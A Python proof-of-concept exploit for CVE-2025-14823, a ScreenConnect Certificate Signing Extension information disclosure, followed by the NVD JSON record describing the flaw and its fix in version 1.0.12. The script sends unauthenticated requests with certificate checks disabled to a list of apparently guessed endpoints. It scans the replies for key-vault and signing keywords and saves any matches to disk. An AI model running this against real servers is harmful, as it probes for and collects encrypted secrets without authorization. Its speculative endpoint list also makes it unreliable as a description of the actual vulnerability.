CVE-2025-14823

# CVE-2025-14823 PoC - Information Disclosure # Target: ScreenConnect Certificate Signing Extension # Description: Unauthenticated access to encrypted configuration values import requests import json TARGET_URL = "https://vulnerable-server/" def exploit_cve_2025_14823(): """ Exploit for CVE-2025-14823 Attempts to retrieve encrypted configuration values including Azure Key Vault keys through client-facing endpoints without authentication. """ # Common endpoints that might expose configuration endpoints = [ "ClientService.axd", "api/session/config", "SetupWizard.aspx", "CertificateSigning/Config", ] print("[*] CVE-2025-14823 - ScreenConnect Certificate Signing Extension Info Disclosure") print(f"[*] Target: {TARGET_URL}") for endpoint in endpoints: try: url = f"{TARGET_URL}{endpoint}" # Send unauthenticated request response = requests.get(url, timeout=10, verify=False) # Check for encrypted configuration values in response if response.status_code == 200: content = response.text # Look for patterns indicating encrypted key vault data if any(pattern in content.lower() for pattern in [ "azurekeyvault", "encrypted", "keystore", "keyvault", "configuration", "certificate", "signing" ]): print(f"[!] Potential sensitive data found at: {url}") print(f"[!] Response length: {len(content)} bytes") # Save response for analysis with open(f"cve_2025_14823_response_{endpoint.replace('/', '_')}.txt", 'w') as f: f.write(content) print(f"[!] Response saved for analysis") return True except requests.RequestException as e: print(f"[-] Error accessing {endpoint}: {e}") print("[*] Exploitation complete. Check saved responses for encrypted configuration data.") return False if __name__ == "__main__": exploit_cve_2025_14823()

{"cve": {"id": "CVE-2025-14823", "sourceIdentifier": "7d616e1a-3288-43b1-a0dd-0a65d3e70a49", "published": "2025-12-18T16:15:52.503", "lastModified": "2026-01-16T19:10:48.387", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In deployments using the ScreenConnect™ Certificate Signing Extension, encrypted configuration values including an Azure Key Vault-related key, could be returned to unauthenticated users through a client-facing endpoint under certain conditions. The values remained encrypted and securely stored at rest; however, an encrypted representation could be exposed in client responses. Updating the Certificate Signing Extension to version 1.0.12 or higher ensures configuration handling occurs exclusively on the server side, preventing encrypted values from being transmitted to or rendered by client-side components."}], "metrics": {"cvssMetricV31": [{"source": "7d616e1a-3288-43b1-a0dd-0a65d3e70a49", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "7d616e1a-3288-43b1-a0dd-0a65d3e70a49", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-201"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:connectwise:screenconnect:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.0.12", "matchCriteriaId": "3BEF42B2-9FB7-4AD0-9B7A-3980D1670F72"}]}]}], "references": [{"url": "https://www.connectwise.com/company/trust/security-bulletins/2025-12-18-screenconnect-certificate-signing-extension-update", "source": "7d616e1a-3288-43b1-a0dd-0a65d3e70a49", "tags": ["Vendor Advisory"]}]}}